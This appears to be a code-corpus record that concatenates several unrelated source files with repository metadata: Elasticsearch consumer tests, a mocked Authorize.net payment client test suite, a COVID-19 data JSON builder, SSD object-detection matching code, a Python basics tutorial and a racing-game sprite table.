parser.add_argument('-e', '--epochs', type=int, default=70)
parser.add_argument('-s', '--step_size', type=int, default=55)
parser.add_argument('--lamda', type=float, default=0.5)
main(parser.parse_args())
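    # Example invocation (illustrative only; the flags shown match the defaults above):
    #   python atmpro1_vsm2.py --dataset mars --EF 10 --exp_name atm --exp_order 0 --log_name pl_logs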
| 2.09375 | 2 |
consumer/tests/test__index_handler.py | eHealthAfrica/aether-elasticsearch-consumer | 0 | 1256 | <filename>consumer/tests/test__index_handler.py<gh_stars>0
# Copyright (C) 2019 by eHealth Africa : http://www.eHealthAfrica.org
#
# See the NOTICE file distributed with this work for additional information
# regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
import pytest
import requests
import responses
from time import sleep
from elasticsearch.exceptions import NotFoundError
from aet.logger import get_logger
from app import index_handler
from . import * # noqa # fixtures
LOG = get_logger('TEST-IDX')
# convenience function for jsonpath
@responses.activate
@pytest.mark.unit
def test__handle_http():
responses.add(
responses.GET,
'http://bad-url',
json={'error': 'not found'},
status=404
)
res = requests.get('http://bad-url')
with pytest.raises(requests.exceptions.HTTPError):
index_handler.handle_http(res)
@pytest.mark.unit
def test__get_es_index_from_autoconfig(SubscriptionDefinition, ComplexSchema):
es_options = SubscriptionDefinition.get('es_options')
tenant = 'dev'
name = 'a-topic'
alias = es_options.get('alias_name')
index = index_handler.get_es_index_from_subscription(
es_options, name, tenant, ComplexSchema
)
LOG.debug(json.dumps(index, indent=2))
assert(first('$.name', index) == f'{tenant}.{name}')
geo_name = es_options['geo_point_name']
assert(first(
f'$.body.mappings._doc.properties.{geo_name}', index) is not None)
@pytest.mark.unit
def test__get_index_for_topic(SubscriptionDefinition, ComplexSchema):
name = 'Person'
es_options = SubscriptionDefinition.get('es_options')
geo_name = es_options.get('geo_point_name')
auto_ts = es_options.get('auto_timestamp')
index = index_handler.get_index_for_topic(name, geo_name, auto_ts, ComplexSchema)
index = index.get('mappings', None)
assert(len(index) == 1)
assert(first('$._doc', index) is not None)
assert(first(f'$._doc.properties.{geo_name}.type', index) == 'geo_point')
assert(first(f'$._doc._meta.aet_auto_ts', index) == auto_ts)
@pytest.mark.unit
def test__get_es_types_from_schema(ComplexSchema):
res = index_handler.get_es_types_from_schema(ComplexSchema)
assert(first('$.beds.type', res) == 'integer')
assert(first('$.username.type', res) == 'keyword')
assert(first('$._start.type', res) == 'date')
assert(first('$.geometry.type', res) == 'object')
assert(first('$.meta.type', res) == 'object')
assert(first('$.mandatory_date.type', res) == 'date')
assert(first('$.mandatory_date.format', res) == 'date')
assert(first('$.optional_dt.type', res) == 'date')
assert(first('$.optional_dt.format', res) == 'epoch_millis')
assert(len(list(res.keys())) == 55)
@pytest.mark.unit
def test__make_kibana_index(AutoGenSchema):
name = 'kibana-index-name'
res = index_handler.make_kibana_index(name, AutoGenSchema)
assert(res.get('attributes', {}).get('title') == name)
@pytest.mark.unit
def test___find_timestamp(ComplexSchema):
result = index_handler._find_timestamp(ComplexSchema)
assert(result == 'timestamp')
@pytest.mark.unit
def test___format_lookups(ComplexSchema):
formatted = index_handler._format_lookups(ComplexSchema)
assert(
json.dumps(
formatted.get(
'operational_status'), sort_keys=True) ==
json.dumps(
SAMPLE_FIELD_LOOKUP.get(
'operational_status'), sort_keys=True)
)
@pytest.mark.unit
def test___format_single_lookup(ComplexSchema):
matching = ComplexSchema.get_node('MySurvey.operational_status')
res = index_handler._format_single_lookup(matching)
assert(
json.dumps(res, sort_keys=True) ==
json.dumps(SAMPLE_FIELD_LOOKUP.get(
'operational_status'), sort_keys=True)
)
@pytest.mark.unit
def test__get_alias_from_namespace():
namespace = 'A_Gather_Form_V1'
res = index_handler.get_alias_from_namespace(namespace)
assert(res == 'A_Gather_Form')
@pytest.mark.integration
def test__update_es_index(TestElasticsearch, PolySchemaA, PolySchemaB):
# register index with mapping
es = TestElasticsearch.get_session()
doc_id = 'poly-test-doc'
doc = {
'id': doc_id,
'poly': '1001'
}
index_a = index_handler.get_es_index_from_subscription(
es_options={},
name='test1',
tenant='test-tenant',
schema=PolySchemaA
)
index_name = index_a.get('name')
index_b = index_handler.get_es_index_from_subscription(
es_options={},
name='test1',
tenant='test-tenant',
schema=PolySchemaB
)
alias = index_handler.get_alias_from_namespace(PolySchemaA.name)
# register schema A
index_handler.update_es_index(es, index_a, 'test-tenant', alias)
# put doc
es.create(
index=index_name,
id=doc_id,
body=doc
)
es.indices.refresh(index=index_name)
res = es.search(index=index_name, body={
"query": {"term": {"poly": "1001"}}
})
assert(res.get('hits').get('max_score') < 1.0) # find imperfect by string
res = es.search(index=index_name, body={
"query": {"term": {"poly": 1001}}
})
assert(res.get('hits').get('max_score') < 1.0) # find imperfect by string
# migrate to schema B
index_handler.update_es_index(es, index_b, 'test-tenant', alias)
es.indices.refresh(index=index_name)
res = es.search(index=index_name, body={
"query": {"term": {"poly": "1001"}}
})
assert(res.get('hits').get('max_score') == 1.0) # find by string
res = es.search(index=index_name, body={
"query": {"term": {"poly": 1001}}
})
assert(res.get('hits').get('max_score') == 1.0) # find by int
| 1.664063 | 2 |
plans/config.py | datopian/plans | 3 | 1257 | import os
database_url = os.environ.get('DATABASE_URL')
| 1.359375 | 1 |
Assignment Day 2 .py | ShubhamKahlon57/Letsupgrade-python-Batch-7 | 0 | 1258 | #!/usr/bin/env python
# coding: utf-8
# In[ ]:
#List and function
# In[6]:
# empty list
my_list = []
# list of integers
my_list = [1, 2, 3]
# list with mixed data types
my_list = [1, "Hello", 3.4]
# In[7]:
# nested list
my_list = ["mouse", [8, 4, 6], ['a']]
# In[11]:
# List indexing
my_list = ['p', 'r', 'o', 'b', 'e']
# Output: p
print(my_list[0])
# Output: o
print(my_list[2])
# Output: e
print(my_list[4])
# Nested List
n_list = ["Happy", [2, 0, 1, 5]]
# Nested indexing
print(n_list[0][1])
print(n_list[1][3])
# Error! Only integer can be used for indexing
# print(my_list[4.0])
# In[9]:
# Appending and Extending lists in Python
odd = [1, 3, 5]
odd.append(7)
print(odd)
odd.extend([9, 11, 13])
print(odd)
# In[13]:
# Deleting list items
my_list = ['p', 'r', 'o', 'b', 'l', 'e', 'm']
# delete one item
del my_list[2]
print(my_list)
# delete multiple items
del my_list[1:5]
print(my_list)
# delete entire list
del my_list
# In[14]:
# Appending and Extending lists in Python
odd = [1, 3, 5]
odd.append(7)
print(odd)
odd.extend([9, 11, 13])
print(odd)
# In[15]:
#Dictionary and function
# In[18]:
# empty dictionary
my_dict = {}
# dictionary with integer keys
my_dict = {1: 'apple', 2: 'ball'}
# dictionary with mixed keys
my_dict = {'name': 'John', 1: [2, 4, 3]}
# using dict()
my_dict = dict({1:'apple', 2:'ball'})
# from sequence having each item as a pair
my_dict = dict([(1,'apple'), (2,'ball')])
# In[20]:
# get vs [] for retrieving elements
my_dict = {'name': 'Jack', 'age': 26}
# Output: Jack
print(my_dict['name'])
# Output: 26
print(my_dict.get('age'))
# In[21]:
# Changing and adding Dictionary Elements
my_dict = {'name': 'Jack', 'age': 26}
# update value
my_dict['age'] = 27
#Output: {'age': 27, 'name': 'Jack'}
print(my_dict)
# add item
my_dict['address'] = 'Downtown'
# Output: {'address': 'Downtown', 'age': 27, 'name': 'Jack'}
print(my_dict)
# In[22]:
#Sets and its function
# In[23]:
my_set = {1, 2, 3}
print(my_set)
# In[24]:
my_set = {1.0, "Hello", (1, 2, 3)}
print(my_set)
# In[25]:
# set cannot have duplicates
my_set = {1, 2, 3, 4, 3, 2}
print(my_set)
# In[26]:
#Tuple and its method
# In[27]:
# Tuple having integers
my_tuple = (1, 2, 3)
print(my_tuple)
# In[28]:
my_tuple = ("hello")
print(type(my_tuple))
# In[30]:
# Accessing tuple elements using indexing
my_tuple = ('p','e','r','m','i','t')
print(my_tuple[0])
print(my_tuple[5])
# In[31]:
print(my_tuple[-1])
# In[32]:
print(my_tuple[-6])
# In[36]:
# Changing tuple values
my_tuple = (4, 2, 3, [6, 5])
# TypeError: 'tuple' object does not support item assignment
# my_tuple[1] = 9
# However, item of mutable element can be changed
my_tuple[3][0] = 9 # Output: (4, 2, 3, [9, 5])
print(my_tuple)
# Tuples can be reassigned
my_tuple = ('p', 'r', 'o', 'g', 'r', 'a', 'm', 'i', 'z')
# Output: ('p', 'r', 'o', 'g', 'r', 'a', 'm', 'i', 'z')
print(my_tuple)
# In[37]:
#String and its function
# In[38]:
# Python string examples - all assignments are identical.
String_var = 'Python'
String_var = "Python"
String_var = """Python"""
# with Triple quotes Strings can extend to multiple lines
String_var = """ This document will help you to
explore all the concepts
of Python Strings!!! """
# Replace "document" with "tutorial" and store in another variable
substr_var = String_var.replace("document", "tutorial")
print (substr_var)
# In[ ]:
| 4.53125 | 5 |
hackerrank/pickingNumbers.py | irvandindaprakoso/online-test-py | 0 | 1259 | def pickingNumbers(a):
    # For each value i in the array, the longest valid pick combines every
    # occurrence of i with every occurrence of i - 1, so all pairwise
    # differences stay <= 1; track the best such count.
    max = 0
for i in a:
c = a.count(i)
d = a.count(i-1)
e = c+d
if e>max:
max = e
return max
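# Worked example (hypothetical call): for a = [1, 1, 2, 2, 4, 4, 5, 5, 5],
# the best pick combines every 4 and 5 (2 + 3 elements), so pickingNumbers(a) == 5.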
| 3.25 | 3 |
tests/test_api_transaction.py | preston-wagner/authorizesauce | 0 | 1260 | from datetime import date
from six import BytesIO, binary_type, u
from six.moves.urllib.parse import parse_qsl, urlencode
from unittest2 import TestCase
import mock
from authorizesauce.apis.transaction import PROD_URL, TEST_URL, TransactionAPI
from authorizesauce.data import Address, CreditCard
from authorizesauce.exceptions import AuthorizeConnectionError, \
AuthorizeResponseError
class MockResponse(BytesIO):
class Headers(dict):
def getparam(self, *args, **kwargs):
"""Python 2 version"""
return None
def get_content_charset(self, failobj=None, *args, **kwargs):
"""Python 3 version"""
return failobj
def __init__(self, *args, **kwargs):
BytesIO.__init__(self, *args, **kwargs)
self.headers = self.Headers()
SUCCESS = MockResponse(
b'1;1;1;This transaction has been approved.;IKRAGJ;Y;2171062816;;;20.00;CC'
    b';auth_only;;Jeffrey;Schenck;;45 Rose Ave;Venice;CA;90291;USA;;;;;;;;;;;;'
b';;;;;375DD9293D7605E20DF0B437EE2A7B92;P;2;;;;;;;;;;;XXXX1111;Visa;;;;;;;'
b';;;;;;;;;;Y')
PARSED_SUCCESS = {
'cvv_response': 'P',
'authorization_code': 'IKRAGJ',
'response_code': '1',
'amount': '20.00',
'transaction_type': 'auth_only',
'avs_response': 'Y',
'response_reason_code': '1',
'response_reason_text': 'This transaction has been approved.',
'transaction_id': '2171062816',
}
ERROR = MockResponse(
b'2;1;2;This transaction has been declined.;000000;N;2171062816;;;20.00;CC'
b';auth_only;;Jeffrey;Schenck;;45 Rose Ave;Venice;CA;90291;USA;;;;;;;;;;;;'
b';;;;;375DD9293D7605E20DF0B437EE2A7B92;N;1;;;;;;;;;;;XXXX1111;Visa;;;;;;;'
b';;;;;;;;;;Y')
PARSED_ERROR = {
'cvv_response': 'N',
'authorization_code': '000000',
'response_code': '2',
'amount': '20.00',
'transaction_type': 'auth_only',
'avs_response': 'N',
'response_reason_code': '2',
'response_reason_text': 'This transaction has been declined.',
'transaction_id': '2171062816',
}
def _unicode_str(s):
if isinstance(s, binary_type):
return s.decode('unicode_escape')
return s
def _are_params_eq(params1, params2):
_params1, _params2 = map(_unicode_str, (params1, params2))
return frozenset(parse_qsl(_params1)) == frozenset(parse_qsl(_params2))
class TransactionAPITests(TestCase):
def setUp(self):
self.api = TransactionAPI('123', '456')
self.success = lambda *args, **kwargs: SUCCESS.seek(0) or SUCCESS
self.error = lambda *args, **kwargs: ERROR.seek(0) or ERROR
self.year = date.today().year + 10
self.credit_card = CreditCard('4111111111111111', self.year, 1, '911')
self.address = Address('45 Rose Ave', 'Venice', 'CA', '90291')
def test_basic_api(self):
api = TransactionAPI('123', '456')
self.assertEqual(api.url, TEST_URL)
api = TransactionAPI('123', '456', debug=False)
self.assertEqual(api.url, PROD_URL)
@mock.patch('authorizesauce.apis.transaction.urlopen')
def test_make_call(self, urlopen):
urlopen.side_effect = self.success
params = {'a': '1', 'b': '2'}
result = self.api._make_call(params)
self.assertEqual(urlopen.call_args[0][0], TEST_URL)
self.assertTrue(_are_params_eq(
urlopen.call_args[1]['data'], urlencode(params)
))
self.assertEqual(result, PARSED_SUCCESS)
@mock.patch('authorizesauce.apis.transaction.urlopen')
def test_make_call_with_unicode(self, urlopen):
urlopen.side_effect = self.success
result = self.api._make_call({u('\xe3'): '1', 'b': u('\xe3')})
self.assertEqual(urlopen.call_args[0][0], TEST_URL)
self.assertTrue(_are_params_eq(
urlopen.call_args[1]['data'], 'b=%C3%A3&%C3%A3=1'
))
self.assertEqual(result, PARSED_SUCCESS)
@mock.patch('authorizesauce.apis.transaction.urlopen')
def test_make_call_connection_error(self, urlopen):
urlopen.side_effect = IOError('Borked')
self.assertRaises(AuthorizeConnectionError, self.api._make_call,
{'a': '1', 'b': '2'})
@mock.patch('authorizesauce.apis.transaction.urlopen')
def test_make_call_response_error(self, urlopen):
urlopen.side_effect = self.error
try:
self.api._make_call({'a': '1', 'b': '2'})
except AuthorizeResponseError as e:
self.assertTrue(str(e).startswith(
'This transaction has been declined.'
))
self.assertEqual(e.full_response, PARSED_ERROR)
def test_add_params(self):
self.assertEqual(self.api._add_params({}), {})
params = self.api._add_params({}, credit_card=self.credit_card)
self.assertEqual(params, {
'x_card_num': '4111111111111111',
'x_exp_date': '01-{0}'.format(self.year),
'x_card_code': '911',
})
params = self.api._add_params({}, address=self.address)
self.assertEqual(params, {
'x_address': '45 Rose Ave',
'x_city': 'Venice',
'x_state': 'CA',
'x_zip': '90291',
'x_country': 'US',
})
params = self.api._add_params(
{}, credit_card=self.credit_card, address=self.address
)
self.assertEqual(params, {
'x_card_num': '4111111111111111',
'x_exp_date': '01-{0}'.format(self.year),
'x_card_code': '911',
'x_address': '45 Rose Ave',
'x_city': 'Venice',
'x_state': 'CA',
'x_zip': '90291',
'x_country': 'US',
})
@mock.patch('authorizesauce.apis.transaction.urlopen')
def test_auth(self, urlopen):
urlopen.side_effect = self.success
result = self.api.auth(20, self.credit_card, self.address)
self.assertEqual(urlopen.call_args[0][0], TEST_URL)
self.assertTrue(urlopen.call_args[1]['data'], (
'x_login=123&x_zip=90291&x_card_num=4111111111111111&'
'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&'
'x_version=3.1&x_state=CA&x_delim_char=%3B&'
'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE'
'&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format(
str(self.year)
)
))
self.assertEqual(result, PARSED_SUCCESS)
@mock.patch('authorizesauce.apis.transaction.urlopen')
def test_capture(self, urlopen):
urlopen.side_effect = self.success
result = self.api.capture(20, self.credit_card, self.address)
self.assertEqual(urlopen.call_args[0][0], TEST_URL)
self.assertTrue(urlopen.call_args[1]['data'], (
'x_login=123&x_zip=90291&x_card_num=4111111111111111&'
'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&'
'x_version=3.1&x_state=CA&x_delim_char=%3B&'
'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE'
'&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format(
str(self.year)
)
))
self.assertEqual(result, PARSED_SUCCESS)
@mock.patch('authorizesauce.apis.transaction.urlopen')
def test_settle(self, urlopen):
urlopen.side_effect = self.success
# Test without specified amount
result = self.api.settle('123456')
self.assertEqual(urlopen.call_args[0][0], TEST_URL)
self.assertTrue(urlopen.call_args[1]['data'], (
'https://test.authorize.net/gateway/transact.dll?x_login=123'
'&x_trans_id=123456&x_version=3.1&x_delim_char=%3B'
'&x_type=PRIOR_AUTH_CAPTURE&x_delim_data=TRUE&x_tran_key=456'
'&x_test_request=FALSE'
))
self.assertEqual(result, PARSED_SUCCESS)
# Test with specified amount
result = self.api.settle('123456', amount=10)
self.assertEqual(urlopen.call_args[0][0], TEST_URL)
self.assertTrue(urlopen.call_args[1]['data'], (
'https://test.authorize.net/gateway/transact.dll?x_login=123'
'&x_trans_id=123456&x_version=3.1&x_delim_char=%3B'
'&x_type=PRIOR_AUTH_CAPTURE&x_amount=10.00&x_delim_data=TRUE'
'&x_tran_key=456&x_test_request=FALSE'
))
self.assertEqual(result, PARSED_SUCCESS)
@mock.patch('authorizesauce.apis.transaction.urlopen')
def test_credit(self, urlopen):
urlopen.side_effect = self.success
# Test with transaction_id, amount
result = self.api.credit('1111', '123456', 10)
self.assertEqual(urlopen.call_args[0][0], TEST_URL)
self.assertTrue(urlopen.call_args[1]['data'], (
'https://test.authorize.net/gateway/transact.dll?x_login=123'
'&x_trans_id=123456&x_version=3.1&x_amount=10.00'
'&x_delim_char=%3B&x_type=CREDIT&x_card_num=1111'
'&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE'
))
self.assertEqual(result, PARSED_SUCCESS)
@mock.patch('authorizesauce.apis.transaction.urlopen')
def test_void(self, urlopen):
urlopen.side_effect = self.success
result = self.api.void('123456')
self.assertEqual(urlopen.call_args[0][0], TEST_URL)
self.assertTrue(urlopen.call_args[1]['data'], (
'https://test.authorize.net/gateway/transact.dll?x_login=123'
'&x_trans_id=123456&x_version=3.1&x_delim_char=%3B&x_type=VOID'
'&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE'
))
self.assertEqual(result, PARSED_SUCCESS)
| 2.21875 | 2 |
build_json.py | sungpyocho/covid19-aichi-tools | 0 | 1261 | <reponame>sungpyocho/covid19-aichi-tools
import csv
import io
import json
import pandas as pd
import sys
from dateutil import tz
from datetime import datetime, date, time, timedelta
# Japan Standard Time (UTC + 09:00)
JST = tz.gettz('Asia/Tokyo')
JST_current_time = datetime.now(tz=JST).strftime('%Y/%m/%d %H:%M')
patients_list = []
patients_summary_dic = {}
# Get the command-line arguments (note: no error handling for bad input)
args = sys.argv
with open('data/patients.csv', 'r', encoding="utf-8") as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
patients_list.append(row)
patients_summary_dic.setdefault(row['date'], 0)
patients_summary_dic[row['date']] += 1
# Generate the list of dates
strdt = datetime.strptime("2020-01-26", '%Y-%m-%d') # start date
enddt = datetime.strptime(args[1], '%Y-%m-%d') # end date
# Compute the number of days between the two dates (+1 so the final day is included in the list)
days_num = (enddt - strdt).days + 1
datelist = []
for i in range(days_num):
datelist.append(strdt + timedelta(days = i))
patients_summary_list = []
# Walk the dates from newest to oldest and start from the first day whose daily count is non-zero
foundZero = True
for date in reversed(datelist):
if (not (date.strftime('%Y-%m-%d') in patients_summary_dic)) and foundZero:
continue
else:
foundZero = False
patients_summary_dic.setdefault(date.strftime('%Y-%m-%d'), 0)
patients_summary_list.append({
"日付": date.strftime('%Y-%m-%d'),
"小計": patients_summary_dic[date.strftime('%Y-%m-%d')]
})
patients_summary_list = patients_summary_list[::-1] # re-sort into ascending date order
# Convert main_summary_history.csv into a pandas DataFrame
main_summary_history_df = pd.read_csv('data/main_summary_history.csv', keep_default_na=False)
# Load the inspection counts
inspections_summary_list = []
with open('data/inspections_summary.csv', 'r', encoding="utf-8") as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
inspections_summary_list.append({
"日付": datetime.strptime(row['検査日'], '%Y/%m/%d').strftime('%Y-%m-%d'),
"小計": int(row['検査件数(件)']),
"合算": row['合算']
})
data = {
"lastUpdate": JST_current_time,
"patients": {
"date": JST_current_time,
"data": patients_list
},
"patients_summary" : {
"date": JST_current_time,
"data": patients_summary_list
},
"inspections_summary" : {
"date": JST_current_time,
"data": inspections_summary_list
},
"main_summary_history": {
"date": JST_current_time,
"data": json.loads(main_summary_history_df.to_json(orient='records', force_ascii=False))
}
}
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')
print(json.dumps(data, indent=4, ensure_ascii=False))
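# Usage sketch (the date is only an example): python build_json.py 2020-05-01 > data.json
# sys.argv[1] is the final date of the patients_summary series, in YYYY-MM-DD form,
# and the combined JSON document is written to standard output.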
| 2.671875 | 3 |
dl/models/ssd/modules/utils.py | jjjkkkjjj/pytorch.dl | 2 | 1262 | import torch
from ....data.utils.boxes import centroids2corners, iou
def matching_strategy(targets, dboxes, **kwargs):
"""
:param targets: Tensor, shape is (batch*object num(batch), 1+4+class_labels)
:param dboxes: shape is (default boxes num, 4)
IMPORTANT: Note that means (cx, cy, w, h)
:param kwargs:
threshold: (Optional) float, threshold for returned indicator
batch_num: (Required) int, batch size
:return:
pos_indicator: Bool Tensor, shape = (batch, default box num). this represents whether each default box is object or background.
matched_targets: Tensor, shape = (batch, default box num, 4+class_num) including background
"""
threshold = kwargs.pop('threshold', 0.5)
batch_num = kwargs.pop('batch_num')
device = dboxes.device
dboxes_num = dboxes.shape[0]
# minus 'box number per image' and 'localization=(cx, cy, w, h)'
class_num = targets[0].shape[1] - 4
# convert centered coordinated to minmax coordinates
dboxes_mm = centroids2corners(dboxes)
# create returned empty Tensor
pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty((batch_num, dboxes_num, 4 + class_num), device=device)
# matching for each batch
index = 0
for b, target in enumerate(targets):
targets_loc, targets_conf = target[:, :4], target[:, 4:]
# overlaps' shape = (object num, default box num)
overlaps = iou(centroids2corners(targets_loc), dboxes_mm.clone())
"""
best_overlap_per_object, best_dbox_ind_per_object = overlaps.max(dim=1)
best_overlap_per_dbox, best_object_ind_per_dbox = overlaps.max(dim=0)
for object_ind, dbox_ind in enumerate(best_dbox_ind_per_object):
best_object_ind_per_dbox[dbox_ind] = object_ind
best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999)
pos_ind = best_overlap_per_dbox > threshold
pos_indicator[b] = pos_ind
gt_loc[b], gt_conf[b] = targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox]
neg_ind = torch.logical_not(pos_ind)
gt_conf[b, neg_ind] = 0
gt_conf[b, neg_ind, -1] = 1
"""
# get maximum overlap value for each default box
# shape = (batch num, dboxes num)
overlaps_per_dbox, object_indices = overlaps.max(dim=0)
#object_indices = object_indices.long() # for fancy indexing
# get maximum overlap values for each object
# shape = (batch num, object num)
overlaps_per_object, dbox_indices = overlaps.max(dim=1)
for obj_ind, dbox_ind in enumerate(dbox_indices):
object_indices[dbox_ind] = obj_ind
overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1)# ensure N!=0
pos_ind = overlaps_per_dbox > threshold
# assign targets
matched_targets[b, :, :4], matched_targets[b, :, 4:] = targets_loc[object_indices], targets_conf[object_indices]
pos_indicator[b] = pos_ind
# set background flag
neg_ind = torch.logical_not(pos_ind)
matched_targets[b, neg_ind, 4:] = 0
matched_targets[b, neg_ind, -1] = 1
return pos_indicator, matched_targets
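# Illustrative call of matching_strategy (shapes follow the docstring above; the
# tensors themselves are made-up placeholders, not real SSD data):
#   dboxes = torch.rand(8732, 4)                          # default boxes as (cx, cy, w, h)
#   targets = [torch.rand(3, 4 + 21) for _ in range(2)]   # per-image boxes + one-hot labels
#   pos_indicator, matched_targets = matching_strategy(targets, dboxes,
#                                                      threshold=0.5, batch_num=len(targets))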
def matching_strategy_quads(targets, dboxes, **kwargs):
"""
:param targets: Tensor, shape is (batch*object num(batch), 4=(cx,cy,w,h)+8=(x1,y1,x2,y2,...)+class_labels)
:param dboxes: shape is (default boxes num, 4)
IMPORTANT: Note that means (cx, cy, w, h)
:param kwargs:
threshold: (Optional) float, threshold for returned indicator
batch_num: (Required) int, batch size
:return:
pos_indicator: Bool Tensor, shape = (batch, default box num). this represents whether each default box is object or background.
matched_targets: Tensor, shape = (batch, default box num, 4+class_num) including background
"""
threshold = kwargs.pop('threshold', 0.5)
batch_num = kwargs.pop('batch_num')
device = dboxes.device
dboxes_num = dboxes.shape[0]
# minus 'box number per image' and 'localization=(cx, cy, w, h)'
class_num = targets[0].shape[1] - 4 - 8
# convert centered coordinated to minmax coordinates
dboxes_mm = centroids2corners(dboxes)
# create returned empty Tensor
pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty(
(batch_num, dboxes_num, 4 + 8 + class_num), device=device)
# matching for each batch
index = 0
for b, target in enumerate(targets):
targets_loc, targets_quad, targets_conf = target[:, :4], target[:, 4:12], target[:, 12:]
# overlaps' shape = (object num, default box num)
overlaps = iou(centroids2corners(targets_loc), dboxes_mm.clone())
"""
best_overlap_per_object, best_dbox_ind_per_object = overlaps.max(dim=1)
best_overlap_per_dbox, best_object_ind_per_dbox = overlaps.max(dim=0)
for object_ind, dbox_ind in enumerate(best_dbox_ind_per_object):
best_object_ind_per_dbox[dbox_ind] = object_ind
best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999)
pos_ind = best_overlap_per_dbox > threshold
pos_indicator[b] = pos_ind
gt_loc[b], gt_conf[b] = targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox]
neg_ind = torch.logical_not(pos_ind)
gt_conf[b, neg_ind] = 0
gt_conf[b, neg_ind, -1] = 1
"""
# get maximum overlap value for each default box
# shape = (batch num, dboxes num)
overlaps_per_dbox, object_indices = overlaps.max(dim=0)
# object_indices = object_indices.long() # for fancy indexing
# get maximum overlap values for each object
# shape = (batch num, object num)
overlaps_per_object, dbox_indices = overlaps.max(dim=1)
for obj_ind, dbox_ind in enumerate(dbox_indices):
object_indices[dbox_ind] = obj_ind
overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1) # ensure N!=0
pos_ind = overlaps_per_dbox > threshold
# assign targets
matched_targets[b, :, :4], matched_targets[b, :, 4:12], matched_targets[b, :, 12:] = \
targets_loc[object_indices], targets_quad[object_indices], targets_conf[object_indices]
pos_indicator[b] = pos_ind
# set background flag
neg_ind = torch.logical_not(pos_ind)
matched_targets[b, neg_ind, 12:] = 0
matched_targets[b, neg_ind, -1] = 1
return pos_indicator, matched_targets
| 2.265625 | 2 |
sandroad.py | lancelee82/bluelake | 0 | 1263 | """
Flatpath, go forward forever.
http://codeincomplete.com/posts/javascript-racer/
http://www.extentofthejam.com/pseudo/
http://pixel.garoux.net/screen/game_list
Usage:
* UP/DOWN/LEFT/RIGHT
* SPACE : hide/show road map
* TAB : replay this road
* RETURN : go to a new road
TODO:
* hill road
* more road sprites
* sound
"""
import math
import random
import time
from starfish import pygm
from starfish import consts
from starfish import sptdraw
from starfish import utils
IMG_POS_BACKGROUND = {
'HILLS': { 'x': 5, 'y': 5, 'w': 1280, 'h': 480 },
'SKY': { 'x': 5, 'y': 495, 'w': 1280, 'h': 480 },
'TREES': { 'x': 5, 'y': 985, 'w': 1280, 'h': 480 },
}
IMG_POS_SPRITES = {
'PALM_TREE': { 'x': 5, 'y': 5, 'w': 215, 'h': 540 },
'BILLBOARD08': { 'x': 230, 'y': 5, 'w': 385, 'h': 265 },
'TREE1': { 'x': 625, 'y': 5, 'w': 360, 'h': 360 },
'DEAD_TREE1': { 'x': 5, 'y': 555, 'w': 135, 'h': 332 },
'BILLBOARD09': { 'x': 150, 'y': 555, 'w': 328, 'h': 282 },
'BOULDER3': { 'x': 230, 'y': 280, 'w': 320, 'h': 220 },
'COLUMN': { 'x': 995, 'y': 5, 'w': 200, 'h': 315 },
'BILLBOARD01': { 'x': 625, 'y': 375, 'w': 300, 'h': 170 },
'BILLBOARD06': { 'x': 488, 'y': 555, 'w': 298, 'h': 190 },
'BILLBOARD05': { 'x': 5, 'y': 897, 'w': 298, 'h': 190 },
'BILLBOARD07': { 'x': 313, 'y': 897, 'w': 298, 'h': 190 },
'BOULDER2': { 'x': 621, 'y': 897, 'w': 298, 'h': 140 },
'TREE2': { 'x': 1205, 'y': 5, 'w': 282, 'h': 295 },
'BILLBOARD04': { 'x': 1205, 'y': 310, 'w': 268, 'h': 170 },
'DEAD_TREE2': { 'x': 1205, 'y': 490, 'w': 150, 'h': 260 },
'BOULDER1': { 'x': 1205, 'y': 760, 'w': 168, 'h': 248 },
'BUSH1': { 'x': 5, 'y': 1097, 'w': 240, 'h': 155 },
'CACTUS': { 'x': 929, 'y': 897, 'w': 235, 'h': 118 },
'BUSH2': { 'x': 255, 'y': 1097, 'w': 232, 'h': 152 },
'BILLBOARD03': { 'x': 5, 'y': 1262, 'w': 230, 'h': 220 },
'BILLBOARD02': { 'x': 245, 'y': 1262, 'w': 215, 'h': 220 },
'STUMP': { 'x': 995, 'y': 330, 'w': 195, 'h': 140 },
'SEMI': { 'x': 1365, 'y': 490, 'w': 122, 'h': 144 },
'TRUCK': { 'x': 1365, 'y': 644, 'w': 100, 'h': 78 },
'CAR03': { 'x': 1383, 'y': 760, 'w': 88, 'h': 55 },
'CAR02': { 'x': 1383, 'y': 825, 'w': 80, 'h': 59 },
'CAR04': { 'x': 1383, 'y': 894, 'w': 80, 'h': 57 },
'CAR01': { 'x': 1205, 'y': 1018, 'w': 80, 'h': 56 },
'PLAYER_UPHILL_LEFT': { 'x': 1383, 'y': 961, 'w': 80, 'h': 45 },
'PLAYER_UPHILL_STRAIGHT': { 'x': 1295, 'y': 1018, 'w': 80, 'h': 45 },
'PLAYER_UPHILL_RIGHT': { 'x': 1385, 'y': 1018, 'w': 80, 'h': 45 },
'PLAYER_LEFT': { 'x': 995, 'y': 480, 'w': 80, 'h': 41 },
'PLAYER_STRAIGHT': { 'x': 1085, 'y': 480, 'w': 80, 'h': 41 },
